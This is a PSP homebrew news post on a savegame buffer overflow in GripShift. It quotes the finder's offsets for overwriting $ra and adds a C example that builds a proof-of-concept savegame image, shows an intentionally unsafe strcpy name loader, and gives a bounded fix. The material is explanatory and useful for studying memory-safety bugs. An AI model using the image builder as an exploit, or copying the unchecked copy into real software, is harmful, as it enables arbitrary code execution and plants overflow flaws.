Aah, yes, new exploit, old game. It's so cool to actually see this beauty working - and on a PSP-3000 no less! The PSP scene was buzzing the other day when MaTiAz found an exploit (read: a buffer overflow) in the three-year-old game GripShift.
MaTiAz says they have yet to find any further use for it, but it's still a new exploit. For now it is only a proof of concept that runs arbitrary code, and it could lead to further hacks. Be that as it may, this is a great start and a rather sweet find. Here's MaTiAz explaining the exploit:
"GripShift has a buffer overflow vulnerability when loading savegames. The savegame contains the profile name, which can be easily used to overwrite $ra. The savegame file is pretty big (25kB), so you have lots of space to put your code there. I wrote a simple blob of code to paint the framebuffer completely white (to just indicate that arbitrary code is running). The return address is located at offset 0xA9 in the file. In this POC it points to 0x08E4CD50 (which is only a few bytes after the return address), and the code starts at 0xCC in the file."
"It was tested on 4.01 M33-2 with the US version of GripShift (ULUS10040), and psplink.prx, usbhostfs.prx and deemerh.prx loaded (also without psplink and usbhostfs). The decrypted savegame (sorry, couldn't [be bothered to] get Shine's savegame tool working, so it's in plaintext form) is in the SDDATA.BIN form which Hellcat's Savegame-Deemer produces (thanks to him; if the program didn't exist I wouldn't have bothered with this). Just copy the ULUS10040SAVE00 directory to /PSP/SAVEPLAIN/ and run the game. EDIT: yeah, don't forget to have Savegame-Deemer working, duh."
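To make the layout MaTiAz describes concrete, here is an added example in C; it is not MaTiAz's POC, not GripShift's code, and not part of the original post. It builds a 25kB image with the two published offsets (the $ra value at 0xA9 pointing to 0x08E4CD50, code starting at 0xCC) and, beside that, shows the unbounded profile-name copy that makes such an overflow possible next to the bounded check a loader should do instead. Everything not stated in the post is an assumption: the 16-byte `NAME_BUF`, where the name field sits, and the payload, which here is a placeholder of MIPS nops rather than the framebuffer-painting code. The `SDDATA.BIN` that `main` writes is only the raw layout; it is not a working savegame and does not go through Savegame-Deemer.

```c
/*
 * Added example, not code from the post, from GripShift or from MaTiAz.
 * Lays out a POC savegame image with the two offsets the post gives and
 * shows the bounded-copy check a loader needs so a long profile name can
 * never reach the saved $ra.  NAME_BUF and the name field's position are
 * assumptions, not GripShift's real layout.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SAVE_SIZE      (25 * 1024)  /* "pretty big (25kB)", per the post */
#define RA_OFFSET      0xA9         /* file offset of the $ra value (from the post) */
#define PAYLOAD_OFFSET 0xCC         /* file offset where the code starts (from the post) */
#define RA_TARGET      0x08E4CD50u  /* address the overwritten $ra returns to (from the post) */
#define NAME_BUF       16           /* assumed size of the loader's name buffer */

/* The PSP's MIPS core is little-endian, so $ra is stored low byte first. */
static void put_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

static uint32_t get_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Build the POC image: zero-filled (0x00000000 is a MIPS nop, so the gap
 * between the $ra slot and the payload is a harmless sled), the new $ra at
 * RA_OFFSET, the caller's payload at PAYLOAD_OFFSET.  The framebuffer code
 * from the post is not reproduced.  Returns the image size, or 0 on bad input. */
size_t build_poc_save(uint8_t *img, size_t img_len,
                      const uint8_t *payload, size_t payload_len)
{
    if (img_len < SAVE_SIZE || payload_len > SAVE_SIZE - PAYLOAD_OFFSET)
        return 0;
    memset(img, 0, SAVE_SIZE);
    put_le32(img + RA_OFFSET, RA_TARGET);
    memcpy(img + PAYLOAD_OFFSET, payload, payload_len);
    return SAVE_SIZE;
}

/* The $ra value a loader would pop from this image. */
uint32_t poc_return_address(const uint8_t *img)
{
    return get_le32(img + RA_OFFSET);
}

/* Vulnerable pattern (assumed, for contrast): the copy trusts the NUL the
 * file claims to have, so a long name runs over the stack frame and $ra. */
void load_name_unchecked(char dst[NAME_BUF], const char *field)
{
    strcpy(dst, field);
}

/* Hardened: search for the NUL only inside the field and require it to fall
 * within NAME_BUF; otherwise reject the save.  Returns 1 accepted, 0 rejected. */
int load_name_checked(char dst[NAME_BUF], const uint8_t *field, size_t field_len)
{
    const uint8_t *nul = memchr(field, 0, field_len);
    if (nul == NULL || (size_t)(nul - field) >= NAME_BUF)
        return 0;
    memcpy(dst, field, (size_t)(nul - field) + 1);
    return 1;
}

/* Wrapper with its own buffer so the check can be exercised directly. */
int name_accepted(const uint8_t *field, size_t field_len)
{
    char dst[NAME_BUF];
    return load_name_checked(dst, field, field_len);
}

static uint8_t g_img[SAVE_SIZE];

/* Builds the image into g_img with a placeholder payload of two nops. */
const uint8_t *demo_image(void)
{
    static const uint8_t nops[8] = {0};  /* placeholder, not shellcode */
    return build_poc_save(g_img, sizeof g_img, nops, sizeof nops) ? g_img : NULL;
}

/* Stand-alone use: dump the layout to SDDATA.BIN in the current directory. */
int main(void)
{
    const uint8_t *img = demo_image();
    FILE *f = fopen("SDDATA.BIN", "wb");
    if (img == NULL || f == NULL || fwrite(img, 1, SAVE_SIZE, f) != SAVE_SIZE)
        return 1;
    fclose(f);
    printf("wrote %d bytes, $ra at 0x%X -> 0x%08X, code at 0x%X\n",
           SAVE_SIZE, RA_OFFSET, poc_return_address(img), PAYLOAD_OFFSET);
    return 0;
}
```

The check in `load_name_checked` is the whole fix: the length that matters is the distance to a NUL inside the file's own field, never the NUL `strcpy` hopes to find, and a name that is unterminated or longer than the destination is rejected rather than truncated silently.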